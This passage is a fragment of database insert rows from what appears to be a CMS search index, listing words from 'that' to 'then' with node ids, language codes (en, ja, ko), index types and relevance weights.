('that', 78, 'en', 'help_search', 2),
('that', 78, 'ja', 'help_search', 2),
('that', 78, 'ko', 'help_search', 2),
('that', 79, 'en', 'help_search', 3),
('that', 79, 'ja', 'help_search', 3),
('that', 79, 'ko', 'help_search', 3),
('that', 80, 'en', 'help_search', 1.92221),
('that', 80, 'ja', 'help_search', 1.92221),
('that', 80, 'ko', 'help_search', 1.92221),
('that', 81, 'en', 'help_search', 5),
('that', 81, 'ja', 'help_search', 5),
('that', 81, 'ko', 'help_search', 5),
('that', 82, 'en', 'help_search', 1),
('that', 82, 'ja', 'help_search', 1),
('that', 82, 'ko', 'help_search', 1),
('that', 84, 'en', 'help_search', 1),
('that', 84, 'ja', 'help_search', 1),
('that', 84, 'ko', 'help_search', 1),
('that', 85, 'en', 'help_search', 2),
('that', 85, 'ja', 'help_search', 2),
('that', 85, 'ko', 'help_search', 2),
('that', 86, 'en', 'help_search', 7.92329),
('that', 86, 'ja', 'help_search', 7.92329),
('that', 86, 'ko', 'help_search', 7.92329),
('that', 87, 'en', 'node_search', 1),
('that', 88, 'en', 'help_search', 1),
('that', 88, 'ja', 'help_search', 1),
('that', 88, 'ko', 'help_search', 1),
('that', 89, 'en', 'help_search', 3),
('that', 89, 'ja', 'help_search', 3),
('that', 89, 'ko', 'help_search', 3),
('that', 91, 'en', 'help_search', 3),
('that', 91, 'ja', 'help_search', 3),
('that', 91, 'ko', 'help_search', 3),
('that', 92, 'en', 'help_search', 5),
('that', 92, 'ja', 'help_search', 5),
('that', 92, 'ko', 'help_search', 5),
('that', 93, 'en', 'help_search', 0.993146),
('that', 93, 'ja', 'help_search', 0.993146),
('that', 93, 'ko', 'help_search', 0.993146),
('that', 116, 'en', 'node_search', 1),
('that', 135, 'en', 'node_search', 1),
('that', 136, 'en', 'node_search', 1),
('that', 138, 'en', 'node_search', 1),
('that', 154, 'en', 'node_search', 1),
('that', 156, 'en', 'node_search', 1),
('that', 157, 'en', 'node_search', 1),
('that', 160, 'en', 'node_search', 1),
('that', 161, 'en', 'node_search', 1),
('that', 164, 'en', 'node_search', 1),
('that', 165, 'en', 'node_search', 1),
('that', 166, 'en', 'node_search', 1),
('that', 167, 'en', 'node_search', 1),
('that', 168, 'en', 'node_search', 1),
('that', 169, 'en', 'node_search', 1),
('that', 170, 'en', 'node_search', 1),
('that', 171, 'en', 'node_search', 1),
('that', 173, 'en', 'node_search', 1),
('that', 174, 'en', 'node_search', 1),
('that', 175, 'en', 'node_search', 1),
('that', 176, 'en', 'node_search', 2),
('that', 177, 'en', 'node_search', 1),
('that', 178, 'en', 'node_search', 1),
('that', 180, 'en', 'node_search', 1),
('that', 181, 'en', 'node_search', 1),
('that', 182, 'en', 'node_search', 1),
('that', 183, 'en', 'node_search', 1),
('that', 184, 'en', 'node_search', 1),
('that', 185, 'en', 'node_search', 1),
('that', 186, 'en', 'node_search', 2),
('that', 187, 'en', 'node_search', 1),
('that', 188, 'en', 'node_search', 2),
('that', 189, 'en', 'node_search', 1),
('that', 190, 'en', 'node_search', 1),
('that', 192, 'en', 'node_search', 1),
('that', 193, 'en', 'node_search', 1),
('that', 194, 'en', 'node_search', 1),
('that', 195, 'en', 'node_search', 1),
('that', 196, 'en', 'node_search', 1),
('that', 197, 'en', 'node_search', 1),
('that', 198, 'en', 'node_search', 2),
('that', 199, 'en', 'node_search', 1),
('thatoe', 119, 'en', 'node_search', 31),
('thatoe', 119, 'ja', 'node_search', 31),
('thaw', 106, 'en', 'node_search', 62),
('thaw', 106, 'ja', 'node_search', 62),
('thaw', 173, 'en', 'node_search', 1),
('thaw', 173, 'ja', 'node_search', 1),
('thazin', 73, 'en', 'node_search', 1),
('thazin', 73, 'ja', 'node_search', 1),
('thazin', 97, 'en', 'node_search', 2),
('thazin', 97, 'ja', 'node_search', 2),
('thazin', 111, 'en', 'node_search', 2),
('thazin', 111, 'ja', 'node_search', 2),
('thazin', 182, 'en', 'node_search', 5),
('thazin', 182, 'ja', 'node_search', 5.2547),
('the', 1, 'en', 'help_search', 25),
('the', 1, 'en', 'node_search', 1),
('the', 1, 'ja', 'help_search', 25),
('the', 1, 'ko', 'help_search', 25),
('the', 2, 'en', 'help_search', 47),
('the', 2, 'ja', 'help_search', 47),
('the', 2, 'ko', 'help_search', 47),
('the', 3, 'en', 'help_search', 10),
('the', 3, 'en', 'node_search', 10.989),
('the', 3, 'ja', 'help_search', 10),
('the', 3, 'ko', 'help_search', 10),
('the', 3, 'ko', 'node_search', 10.9809),
('the', 4, 'en', 'help_search', 6),
('the', 4, 'en', 'node_search', 2),
('the', 4, 'ja', 'help_search', 6),
('the', 4, 'ja', 'node_search', 2),
('the', 4, 'ko', 'help_search', 6),
('the', 5, 'en', 'help_search', 8),
('the', 5, 'ja', 'help_search', 8),
('the', 5, 'ko', 'help_search', 8),
('the', 6, 'en', 'help_search', 14.8913),
('the', 6, 'en', 'node_search', 59),
('the', 6, 'ja', 'help_search', 14.8913),
('the', 6, 'ko', 'help_search', 14.8913),
('the', 7, 'en', 'help_search', 28.732),
('the', 7, 'en', 'node_search', 2),
('the', 7, 'ja', 'help_search', 28.732),
('the', 7, 'ko', 'help_search', 28.732),
('the', 7, 'ko', 'node_search', 2),
('the', 8, 'en', 'help_search', 14),
('the', 8, 'ja', 'help_search', 14),
('the', 8, 'ko', 'help_search', 14),
('the', 9, 'en', 'help_search', 11),
('the', 9, 'en', 'node_search', 37),
('the', 9, 'ja', 'help_search', 11),
('the', 9, 'ko', 'help_search', 11),
('the', 10, 'en', 'help_search', 22),
('the', 10, 'en', 'node_search', 2),
('the', 10, 'ja', 'help_search', 22),
('the', 10, 'ko', 'help_search', 22),
('the', 10, 'ko', 'node_search', 2),
('the', 11, 'en', 'help_search', 7.56866),
('the', 11, 'ja', 'help_search', 7.56866),
('the', 11, 'ko', 'help_search', 7.56866),
('the', 12, 'en', 'help_search', 2),
('the', 12, 'ja', 'help_search', 2),
('the', 12, 'ko', 'help_search', 2),
('the', 13, 'en', 'help_search', 9),
('the', 13, 'ja', 'help_search', 9),
('the', 13, 'ko', 'help_search', 9),
('the', 14, 'en', 'help_search', 8),
('the', 14, 'ja', 'help_search', 8),
('the', 14, 'ko', 'help_search', 8),
('the', 15, 'en', 'help_search', 6),
('the', 15, 'ja', 'help_search', 6),
('the', 15, 'ko', 'help_search', 6),
('the', 16, 'en', 'help_search', 9),
('the', 16, 'ja', 'help_search', 9),
('the', 16, 'ko', 'help_search', 9),
('the', 17, 'en', 'help_search', 53),
('the', 17, 'en', 'node_search', 41),
('the', 17, 'ja', 'help_search', 53),
('the', 17, 'ko', 'help_search', 53),
('the', 18, 'en', 'help_search', 12),
('the', 18, 'ja', 'help_search', 12),
('the', 18, 'ko', 'help_search', 12),
('the', 19, 'en', 'help_search', 8),
('the', 19, 'ja', 'help_search', 8),
('the', 19, 'ko', 'help_search', 8),
('the', 20, 'en', 'help_search', 30),
('the', 20, 'ja', 'help_search', 30),
('the', 20, 'ko', 'help_search', 30),
('the', 21, 'en', 'help_search', 30),
('the', 21, 'ja', 'help_search', 30),
('the', 21, 'ko', 'help_search', 30),
('the', 22, 'en', 'help_search', 30.8869),
('the', 22, 'ja', 'help_search', 30.8869),
('the', 22, 'ko', 'help_search', 30.8869),
('the', 23, 'en', 'help_search', 25.0258),
('the', 23, 'en', 'node_search', 7.64269),
('the', 23, 'ja', 'help_search', 25.0258),
('the', 23, 'ko', 'help_search', 25.0258),
('the', 24, 'en', 'help_search', 22),
('the', 24, 'en', 'node_search', 13.9705),
('the', 24, 'ja', 'help_search', 22),
('the', 24, 'ko', 'help_search', 22),
('the', 25, 'en', 'help_search', 28),
('the', 25, 'en', 'node_search', 3),
('the', 25, 'ja', 'help_search', 28),
('the', 26, 'en', 'help_search', 49),
('the', 26, 'en', 'node_search', 7),
('the', 26, 'ja', 'help_search', 49),
('the', 26, 'ko', 'help_search', 49),
('the', 27, 'en', 'help_search', 27.9931),
('the', 27, 'en', 'node_search', 7.90024),
('the', 27, 'ja', 'help_search', 27.9931),
('the', 27, 'ko', 'help_search', 27.9931),
('the', 28, 'en', 'help_search', 25.6562),
('the', 28, 'ja', 'help_search', 25.6562),
('the', 28, 'ko', 'help_search', 25.6562),
('the', 29, 'en', 'help_search', 44.8969),
('the', 29, 'en', 'node_search', 62),
('the', 29, 'ja', 'help_search', 44.8969),
('the', 29, 'ko', 'help_search', 44.8969),
('the', 30, 'en', 'help_search', 63.3085),
('the', 30, 'en', 'node_search', 28),
('the', 30, 'ja', 'help_search', 63.3085),
('the', 30, 'ko', 'help_search', 63.3085),
('the', 31, 'en', 'node_search', 8.61413),
('the', 31, 'ja', 'help_search', 40.0589),
('the', 32, 'en', 'help_search', 14.9946),
('the', 32, 'ja', 'help_search', 14.9946),
('the', 32, 'ko', 'help_search', 14.9946),
('the', 33, 'en', 'help_search', 6),
('the', 33, 'ja', 'help_search', 6),
('the', 33, 'ko', 'help_search', 6),
('the', 34, 'en', 'help_search', 3),
('the', 34, 'ja', 'help_search', 3),
('the', 34, 'ko', 'help_search', 3),
('the', 35, 'en', 'help_search', 37.9564),
('the', 35, 'ja', 'help_search', 37.9564),
('the', 35, 'ko', 'help_search', 37.9564),
('the', 36, 'en', 'help_search', 7),
('the', 36, 'ja', 'help_search', 7),
('the', 36, 'ko', 'help_search', 7),
('the', 37, 'en', 'help_search', 50.6047),
('the', 37, 'ja', 'help_search', 50.6047),
('the', 37, 'ko', 'help_search', 50.6047),
('the', 38, 'en', 'help_search', 6),
('the', 38, 'ja', 'help_search', 6),
('the', 38, 'ko', 'help_search', 6),
('the', 39, 'en', 'help_search', 23),
('the', 39, 'ja', 'help_search', 23),
('the', 39, 'ko', 'help_search', 23),
('the', 40, 'en', 'help_search', 28),
('the', 40, 'ja', 'help_search', 28),
('the', 40, 'ko', 'help_search', 28),
('the', 41, 'en', 'help_search', 9),
('the', 41, 'ja', 'help_search', 9),
('the', 41, 'ko', 'help_search', 9),
('the', 42, 'en', 'help_search', 40.9849),
('the', 42, 'ja', 'help_search', 40.9849),
('the', 42, 'ko', 'help_search', 40.9849),
('the', 43, 'en', 'help_search', 85.1542),
('the', 43, 'ja', 'help_search', 85.1542),
('the', 43, 'ko', 'help_search', 85.1542),
('the', 44, 'en', 'help_search', 40),
('the', 44, 'ja', 'help_search', 40),
('the', 44, 'ko', 'help_search', 40),
('the', 45, 'en', 'help_search', 25),
('the', 45, 'ja', 'help_search', 25),
('the', 45, 'ko', 'help_search', 25),
('the', 46, 'en', 'help_search', 10.9206),
('the', 46, 'ja', 'help_search', 10.9206),
('the', 46, 'ko', 'help_search', 10.9206),
('the', 47, 'en', 'help_search', 6),
('the', 47, 'ja', 'help_search', 6),
('the', 47, 'ko', 'help_search', 6),
('the', 48, 'en', 'help_search', 13),
('the', 48, 'ja', 'help_search', 13),
('the', 48, 'ko', 'help_search', 13),
('the', 49, 'en', 'help_search', 8),
('the', 49, 'ja', 'help_search', 8),
('the', 49, 'ko', 'help_search', 8),
('the', 50, 'en', 'help_search', 22.9465),
('the', 50, 'ja', 'help_search', 22.9465),
('the', 50, 'ko', 'help_search', 22.9465),
('the', 51, 'en', 'help_search', 4),
('the', 51, 'ja', 'help_search', 4),
('the', 51, 'ko', 'help_search', 4),
('the', 52, 'en', 'help_search', 4),
('the', 52, 'ja', 'help_search', 4),
('the', 52, 'ko', 'help_search', 4),
('the', 53, 'en', 'help_search', 9),
('the', 53, 'ja', 'help_search', 9),
('the', 53, 'ko', 'help_search', 9),
('the', 54, 'en', 'help_search', 7),
('the', 54, 'ja', 'help_search', 7),
('the', 54, 'ko', 'help_search', 7),
('the', 55, 'en', 'help_search', 7),
('the', 55, 'ja', 'help_search', 7),
('the', 55, 'ko', 'help_search', 7),
('the', 56, 'en', 'help_search', 22),
('the', 56, 'ja', 'help_search', 22),
('the', 56, 'ko', 'help_search', 22),
('the', 57, 'en', 'help_search', 14),
('the', 57, 'ja', 'help_search', 14),
('the', 57, 'ko', 'help_search', 14),
('the', 58, 'en', 'help_search', 3),
('the', 58, 'ja', 'help_search', 3),
('the', 58, 'ko', 'help_search', 3),
('the', 59, 'en', 'help_search', 24),
('the', 59, 'ja', 'help_search', 24),
('the', 59, 'ko', 'help_search', 24),
('the', 60, 'en', 'help_search', 20),
('the', 60, 'ja', 'help_search', 20),
('the', 60, 'ko', 'help_search', 20),
('the', 61, 'en', 'help_search', 25.963),
('the', 61, 'ja', 'help_search', 25.963),
('the', 61, 'ko', 'help_search', 25.963),
('the', 62, 'en', 'help_search', 7),
('the', 62, 'en', 'node_search', 31.6788),
('the', 62, 'ja', 'help_search', 7),
('the', 62, 'ko', 'help_search', 7),
('the', 63, 'en', 'help_search', 10),
('the', 63, 'ja', 'help_search', 10),
('the', 63, 'ko', 'help_search', 10),
('the', 64, 'en', 'help_search', 9),
('the', 64, 'ja', 'help_search', 9),
('the', 64, 'ko', 'help_search', 9),
('the', 65, 'en', 'help_search', 17),
('the', 65, 'ja', 'help_search', 17),
('the', 65, 'ko', 'help_search', 17),
('the', 66, 'en', 'help_search', 17),
('the', 66, 'en', 'node_search', 5.92626),
('the', 66, 'ja', 'help_search', 17),
('the', 67, 'en', 'help_search', 65.133),
('the', 67, 'ja', 'help_search', 65.133),
('the', 67, 'ja', 'node_search', 4),
('the', 67, 'ko', 'help_search', 65.133),
('the', 68, 'en', 'help_search', 94.7056),
('the', 68, 'ja', 'help_search', 94.7056),
('the', 68, 'ko', 'help_search', 94.7056),
('the', 69, 'en', 'help_search', 18.8617),
('the', 69, 'en', 'node_search', 2),
('the', 69, 'ja', 'help_search', 18.8617),
('the', 69, 'ko', 'help_search', 18.8617),
('the', 70, 'en', 'help_search', 53),
('the', 70, 'en', 'node_search', 1),
('the', 70, 'ja', 'help_search', 53),
('the', 70, 'ko', 'help_search', 53),
('the', 71, 'en', 'help_search', 18),
('the', 71, 'en', 'node_search', 1),
('the', 71, 'ja', 'help_search', 18),
('the', 71, 'ko', 'help_search', 18),
('the', 72, 'en', 'help_search', 20.4958),
('the', 72, 'en', 'node_search', 1),
('the', 72, 'ja', 'help_search', 20.4958),
('the', 72, 'ko', 'help_search', 20.4958),
('the', 73, 'en', 'help_search', 13),
('the', 73, 'ja', 'help_search', 13),
('the', 73, 'ko', 'help_search', 13),
('the', 74, 'en', 'help_search', 18),
('the', 74, 'en', 'node_search', 1),
('the', 74, 'ja', 'help_search', 18),
('the', 74, 'ko', 'help_search', 18),
('the', 75, 'en', 'help_search', 18),
('the', 75, 'ja', 'help_search', 18),
('the', 75, 'ko', 'help_search', 18),
('the', 76, 'en', 'help_search', 15),
('the', 76, 'ja', 'help_search', 15),
('the', 76, 'ko', 'help_search', 15),
('the', 77, 'en', 'help_search', 25),
('the', 77, 'ja', 'help_search', 25),
('the', 77, 'ko', 'help_search', 25),
('the', 78, 'en', 'help_search', 10),
('the', 78, 'ja', 'help_search', 10),
('the', 78, 'ko', 'help_search', 10),
('the', 79, 'en', 'help_search', 25),
('the', 79, 'ja', 'help_search', 25),
('the', 79, 'ko', 'help_search', 25),
('the', 80, 'en', 'help_search', 14.6866),
('the', 80, 'ja', 'help_search', 14.6866),
('the', 80, 'ko', 'help_search', 14.6866),
('the', 81, 'en', 'help_search', 17),
('the', 81, 'en', 'node_search', 4),
('the', 81, 'ja', 'help_search', 17),
('the', 81, 'ko', 'help_search', 17),
('the', 82, 'en', 'help_search', 9),
('the', 82, 'en', 'node_search', 1),
('the', 82, 'ja', 'help_search', 9),
('the', 82, 'ko', 'help_search', 9),
('the', 83, 'en', 'help_search', 6),
('the', 83, 'ja', 'help_search', 6),
('the', 83, 'ko', 'help_search', 6),
('the', 84, 'en', 'help_search', 6),
('the', 84, 'en', 'node_search', 1),
('the', 84, 'ja', 'help_search', 6),
('the', 84, 'ko', 'help_search', 6),
('the', 85, 'en', 'help_search', 35),
('the', 85, 'en', 'node_search', 4),
('the', 85, 'ja', 'help_search', 35),
('the', 85, 'ko', 'help_search', 35),
('the', 86, 'en', 'help_search', 34.9138),
('the', 86, 'ja', 'help_search', 34.9138),
('the', 86, 'ko', 'help_search', 34.9138),
('the', 87, 'en', 'help_search', 15),
('the', 87, 'en', 'node_search', 6),
('the', 87, 'ja', 'help_search', 15),
('the', 87, 'ko', 'help_search', 15),
('the', 88, 'en', 'help_search', 12),
('the', 88, 'ja', 'help_search', 12),
('the', 88, 'ko', 'help_search', 12),
('the', 89, 'en', 'help_search', 22.9672),
('the', 89, 'ja', 'help_search', 22.9549),
('the', 89, 'ko', 'help_search', 22.9672),
('the', 90, 'en', 'help_search', 7),
('the', 90, 'en', 'node_search', 1),
('the', 90, 'ja', 'help_search', 7),
('the', 90, 'ko', 'help_search', 7),
('the', 91, 'en', 'help_search', 17),
('the', 91, 'ja', 'help_search', 17),
('the', 91, 'ko', 'help_search', 17),
('the', 92, 'en', 'help_search', 13),
('the', 92, 'ja', 'help_search', 13),
('the', 92, 'ko', 'help_search', 13),
('the', 93, 'en', 'help_search', 56.4415),
('the', 93, 'ja', 'help_search', 56.4415),
('the', 93, 'ko', 'help_search', 56.4415),
('the', 98, 'en', 'node_search', 2),
('the', 100, 'en', 'node_search', 4),
('the', 101, 'en', 'node_search', 1),
('the', 102, 'en', 'node_search', 1),
('the', 110, 'en', 'node_search', 1),
('the', 112, 'en', 'node_search', 1),
('the', 113, 'en', 'node_search', 2),
('the', 113, 'ja', 'node_search', 1),
('the', 114, 'en', 'node_search', 1),
('the', 115, 'en', 'node_search', 1),
('the', 116, 'en', 'node_search', 2),
('the', 120, 'en', 'node_search', 49),
('the', 120, 'ja', 'node_search', 27),
('the', 122, 'en', 'node_search', 6),
('the', 125, 'en', 'node_search', 1),
('the', 132, 'en', 'node_search', 1),
('the', 133, 'en', 'node_search', 4),
('the', 135, 'en', 'node_search', 4),
('the', 136, 'en', 'node_search', 1),
('the', 137, 'en', 'node_search', 1),
('the', 139, 'en', 'node_search', 1),
('the', 140, 'en', 'node_search', 5),
('the', 141, 'en', 'node_search', 1),
('the', 142, 'en', 'node_search', 8),
('the', 143, 'en', 'node_search', 1),
('the', 144, 'en', 'node_search', 1),
('the', 146, 'en', 'node_search', 26),
('the', 146, 'ja', 'node_search', 27),
('the', 149, 'en', 'node_search', 47),
('the', 150, 'en', 'node_search', 3),
('the', 154, 'en', 'node_search', 30),
('the', 155, 'en', 'node_search', 8),
('the', 156, 'en', 'node_search', 5),
('the', 157, 'en', 'node_search', 6),
('the', 160, 'en', 'node_search', 7),
('the', 161, 'en', 'node_search', 7),
('the', 164, 'en', 'node_search', 2),
('the', 165, 'en', 'node_search', 3),
('the', 166, 'en', 'node_search', 8),
('the', 167, 'en', 'node_search', 4),
('the', 168, 'en', 'node_search', 9),
('the', 169, 'en', 'node_search', 7),
('the', 170, 'en', 'node_search', 10),
('the', 171, 'en', 'node_search', 5),
('the', 173, 'en', 'node_search', 7),
('the', 174, 'en', 'node_search', 3),
('the', 175, 'en', 'node_search', 3),
('the', 176, 'en', 'node_search', 4),
('the', 177, 'en', 'node_search', 3),
('the', 178, 'en', 'node_search', 5),
('the', 179, 'en', 'node_search', 5),
('the', 180, 'en', 'node_search', 5),
('the', 181, 'en', 'node_search', 3),
('the', 182, 'en', 'node_search', 8),
('the', 183, 'en', 'node_search', 6),
('the', 184, 'en', 'node_search', 4),
('the', 185, 'en', 'node_search', 32),
('the', 186, 'en', 'node_search', 6),
('the', 187, 'en', 'node_search', 8),
('the', 188, 'en', 'node_search', 6),
('the', 189, 'en', 'node_search', 8),
('the', 190, 'en', 'node_search', 9),
('the', 191, 'en', 'node_search', 7),
('the', 192, 'en', 'node_search', 6),
('the', 193, 'en', 'node_search', 36),
('the', 194, 'en', 'node_search', 34),
('the', 195, 'en', 'node_search', 5),
('the', 196, 'en', 'node_search', 7),
('the', 197, 'en', 'node_search', 8),
('the', 198, 'en', 'node_search', 6),
('the', 199, 'en', 'node_search', 7),
('the', 204, 'en', 'node_search', 4),
('the', 204, 'ja', 'node_search', 4),
('their', 1, 'en', 'help_search', 1),
('their', 1, 'ja', 'help_search', 1),
('their', 1, 'ko', 'help_search', 1),
('their', 3, 'en', 'node_search', 1),
('their', 3, 'ko', 'node_search', 1),
('their', 7, 'en', 'help_search', 1),
('their', 7, 'ja', 'help_search', 1),
('their', 7, 'ko', 'help_search', 1),
('their', 20, 'en', 'help_search', 1),
('their', 20, 'ja', 'help_search', 1),
('their', 20, 'ko', 'help_search', 1),
('their', 23, 'en', 'help_search', 0.848323),
('their', 23, 'en', 'node_search', 0.827757),
('their', 23, 'ja', 'help_search', 0.848323),
('their', 23, 'ko', 'help_search', 0.848323),
('their', 25, 'en', 'help_search', 1),
('their', 25, 'ja', 'help_search', 1),
('their', 26, 'en', 'help_search', 1),
('their', 26, 'ja', 'help_search', 1),
('their', 26, 'ko', 'help_search', 1),
('their', 30, 'en', 'help_search', 0.749958),
('their', 30, 'ja', 'help_search', 0.749958),
('their', 30, 'ko', 'help_search', 0.749958),
('their', 38, 'en', 'help_search', 1),
('their', 38, 'ja', 'help_search', 1),
('their', 38, 'ko', 'help_search', 1),
('their', 42, 'en', 'help_search', 1),
('their', 42, 'ja', 'help_search', 1),
('their', 42, 'ko', 'help_search', 1),
('their', 43, 'en', 'help_search', 1),
('their', 43, 'ja', 'help_search', 1),
('their', 43, 'ko', 'help_search', 1),
('their', 46, 'en', 'help_search', 1),
('their', 46, 'ja', 'help_search', 1),
('their', 46, 'ko', 'help_search', 1),
('their', 50, 'en', 'help_search', 1.98902),
('their', 50, 'ja', 'help_search', 1.98902),
('their', 50, 'ko', 'help_search', 1.98902),
('their', 67, 'en', 'help_search', 1),
('their', 67, 'ja', 'help_search', 1),
('their', 67, 'ko', 'help_search', 1),
('their', 69, 'en', 'help_search', 1.96109),
('their', 69, 'en', 'node_search', 1),
('their', 69, 'ja', 'help_search', 1.96109),
('their', 69, 'ko', 'help_search', 1.96109),
('their', 70, 'en', 'help_search', 1),
('their', 70, 'ja', 'help_search', 1),
('their', 70, 'ko', 'help_search', 1),
('their', 80, 'en', 'node_search', 7),
('their', 81, 'en', 'help_search', 1),
('their', 81, 'ja', 'help_search', 1),
('their', 81, 'ko', 'help_search', 1),
('their', 86, 'en', 'help_search', 3.98902),
('their', 86, 'ja', 'help_search', 3.98902),
('their', 86, 'ko', 'help_search', 3.98902),
('their', 87, 'en', 'node_search', 1),
('their', 120, 'en', 'node_search', 6),
('their', 136, 'en', 'node_search', 1),
('their', 142, 'en', 'node_search', 3),
('their', 150, 'en', 'node_search', 1),
('their', 154, 'en', 'node_search', 3),
('their', 157, 'en', 'node_search', 4),
('their', 162, 'en', 'node_search', 1),
('their', 164, 'en', 'node_search', 1),
('their', 165, 'en', 'node_search', 4),
('their', 167, 'en', 'node_search', 2),
('their', 169, 'en', 'node_search', 4),
('their', 173, 'en', 'node_search', 30),
('their', 174, 'en', 'node_search', 1),
('their', 176, 'en', 'node_search', 4),
('their', 179, 'en', 'node_search', 1),
('their', 184, 'en', 'node_search', 3),
('them', 11, 'en', 'help_search', 1.8645),
('them', 11, 'ja', 'help_search', 1.8645),
('them', 11, 'ko', 'help_search', 1.8645),
('them', 18, 'en', 'help_search', 2),
('them', 18, 'ja', 'help_search', 2),
('them', 18, 'ko', 'help_search', 2),
('them', 23, 'en', 'help_search', 0.879565),
('them', 23, 'en', 'node_search', 1.6762),
('them', 23, 'ja', 'help_search', 0.879565),
('them', 23, 'ko', 'help_search', 0.879565),
('them', 24, 'en', 'node_search', 1.73841),
('them', 28, 'en', 'help_search', 1.86995),
('them', 28, 'ja', 'help_search', 1.86995),
('them', 28, 'ko', 'help_search', 1.86995),
('them', 37, 'en', 'help_search', 1),
('them', 37, 'ja', 'help_search', 1),
('them', 37, 'ko', 'help_search', 1),
('them', 42, 'en', 'help_search', 1),
('them', 42, 'ja', 'help_search', 1),
('them', 42, 'ko', 'help_search', 1),
('them', 45, 'en', 'help_search', 1),
('them', 45, 'ja', 'help_search', 1),
('them', 45, 'ko', 'help_search', 1),
('them', 69, 'en', 'help_search', 1),
('them', 69, 'ja', 'help_search', 1),
('them', 69, 'ko', 'help_search', 1),
('them', 71, 'en', 'help_search', 1),
('them', 71, 'ja', 'help_search', 1),
('them', 71, 'ko', 'help_search', 1),
('them', 76, 'en', 'help_search', 2),
('them', 76, 'ja', 'help_search', 2),
('them', 76, 'ko', 'help_search', 2),
('them', 80, 'en', 'help_search', 1.99731),
('them', 80, 'en', 'node_search', 1),
('them', 80, 'ja', 'help_search', 1.99731),
('them', 80, 'ko', 'help_search', 1.99731),
('them', 82, 'en', 'help_search', 1),
('them', 82, 'ja', 'help_search', 1),
('them', 82, 'ko', 'help_search', 1),
('them', 87, 'en', 'node_search', 2),
('them', 93, 'en', 'help_search', 0.833529),
('them', 93, 'ja', 'help_search', 0.833529),
('them', 93, 'ko', 'help_search', 0.833529),
('them', 154, 'en', 'node_search', 1),
('them', 157, 'en', 'node_search', 1),
('them', 165, 'en', 'node_search', 1),
('them', 169, 'en', 'node_search', 1),
('them', 173, 'en', 'node_search', 2),
('them', 179, 'en', 'node_search', 1),
('them', 184, 'en', 'node_search', 1),
('theme', 1, 'en', 'help_search', 4),
('theme', 1, 'ja', 'help_search', 4),
('theme', 1, 'ko', 'help_search', 4),
('theme', 2, 'en', 'help_search', 1),
('theme', 2, 'ja', 'help_search', 1),
('theme', 2, 'ko', 'help_search', 1),
('theme', 3, 'en', 'help_search', 3),
('theme', 3, 'ja', 'help_search', 3),
('theme', 3, 'ko', 'help_search', 3),
('theme', 29, 'en', 'help_search', 47.9809),
('theme', 29, 'ja', 'help_search', 47.9809),
('theme', 29, 'ko', 'help_search', 47.9809),
('theme', 30, 'en', 'help_search', 2),
('theme', 30, 'ja', 'help_search', 2),
('theme', 30, 'ko', 'help_search', 2),
('theme', 35, 'en', 'help_search', 1.98902),
('theme', 35, 'ja', 'help_search', 1.98902),
('theme', 35, 'ko', 'help_search', 1.98902),
('theme', 36, 'en', 'help_search', 1),
('theme', 36, 'ja', 'help_search', 1),
('theme', 36, 'ko', 'help_search', 1),
('theme', 45, 'en', 'help_search', 3),
('theme', 45, 'ja', 'help_search', 3),
('theme', 45, 'ko', 'help_search', 3),
('theme', 46, 'en', 'help_search', 2.98493),
('theme', 46, 'ja', 'help_search', 2.98493),
('theme', 46, 'ko', 'help_search', 2.98493),
('theme', 69, 'en', 'help_search', 1),
('theme', 69, 'ja', 'help_search', 1),
('theme', 69, 'ko', 'help_search', 1),
('theme', 77, 'en', 'help_search', 47),
('theme', 77, 'ja', 'help_search', 47),
('theme', 77, 'ko', 'help_search', 47),
('theme', 78, 'en', 'help_search', 37),
('theme', 78, 'ja', 'help_search', 37),
('theme', 78, 'ko', 'help_search', 37),
('themes', 2, 'en', 'help_search', 1),
('themes', 2, 'ja', 'help_search', 1),
('themes', 2, 'ko', 'help_search', 1),
('themes', 6, 'en', 'help_search', 2.96109),
('themes', 6, 'ja', 'help_search', 2.96109),
('themes', 6, 'ko', 'help_search', 2.96109),
('themes', 22, 'en', 'help_search', 1),
('themes', 22, 'ja', 'help_search', 1),
('themes', 22, 'ko', 'help_search', 1),
('themes', 29, 'en', 'help_search', 8.9689),
('themes', 29, 'ja', 'help_search', 8.9689),
('themes', 29, 'ko', 'help_search', 8.9689),
('themes', 30, 'en', 'help_search', 0.699655),
('themes', 30, 'ja', 'help_search', 0.699655),
('themes', 30, 'ko', 'help_search', 0.699655),
('themes', 36, 'en', 'help_search', 1),
('themes', 36, 'ja', 'help_search', 1),
('themes', 36, 'ko', 'help_search', 1),
('themes', 38, 'en', 'help_search', 2),
('themes', 38, 'ja', 'help_search', 2),
('themes', 38, 'ko', 'help_search', 2),
('themes', 39, 'en', 'help_search', 1),
('themes', 39, 'ja', 'help_search', 1),
('themes', 39, 'ko', 'help_search', 1),
('themes', 41, 'en', 'help_search', 1),
('themes', 41, 'ja', 'help_search', 1),
('themes', 41, 'ko', 'help_search', 1),
('themes', 43, 'en', 'help_search', 2.82262),
('themes', 43, 'ja', 'help_search', 2.82262),
('themes', 43, 'ko', 'help_search', 2.82262),
('themes', 46, 'en', 'help_search', 5),
('themes', 46, 'ja', 'help_search', 5),
('themes', 46, 'ko', 'help_search', 5),
('themes', 76, 'en', 'help_search', 2),
('themes', 76, 'ja', 'help_search', 2),
('themes', 76, 'ko', 'help_search', 2),
('themes', 77, 'en', 'help_search', 37),
('themes', 77, 'ja', 'help_search', 37),
('themes', 77, 'ko', 'help_search', 37),
('themes', 78, 'en', 'help_search', 4),
('themes', 78, 'ja', 'help_search', 4),
('themes', 78, 'ko', 'help_search', 4),
('theming', 29, 'en', 'help_search', 10.0841),
('theming', 29, 'ja', 'help_search', 10.0841),
('theming', 29, 'ko', 'help_search', 10.0841),
('themselves', 67, 'ja', 'node_search', 1),
('themselves', 86, 'en', 'help_search', 1),
('themselves', 86, 'ja', 'help_search', 1),
('themselves', 86, 'ko', 'help_search', 1),
('then', 10, 'en', 'help_search', 2),
('then', 10, 'ja', 'help_search', 2),
('then', 10, 'ko', 'help_search', 2),
('then', 13, 'en', 'help_search', 1),
('then', 13, 'ja', 'help_search', 1),
('then', 13, 'ko', 'help_search', 1),
('then', 23, 'en', 'node_search', 1),
('then', 30, 'en', 'help_search', 0.800068),
('then', 30, 'ja', 'help_search', 0.800068),
('then', 30, 'ko', 'help_search', 0.800068),
('then', 46, 'en', 'help_search', 0.976851),
('then', 46, 'ja', 'help_search', 0.976851),
('then', 46, 'ko', 'help_search', 0.976851),
('then', 48, 'en', 'help_search', 1),
('then', 48, 'ja', 'help_search', 1),
('then', 48, 'ko', 'help_search', 1),
('then', 67, 'en', 'help_search', 1),
('then', 67, 'ja', 'help_search', 1),
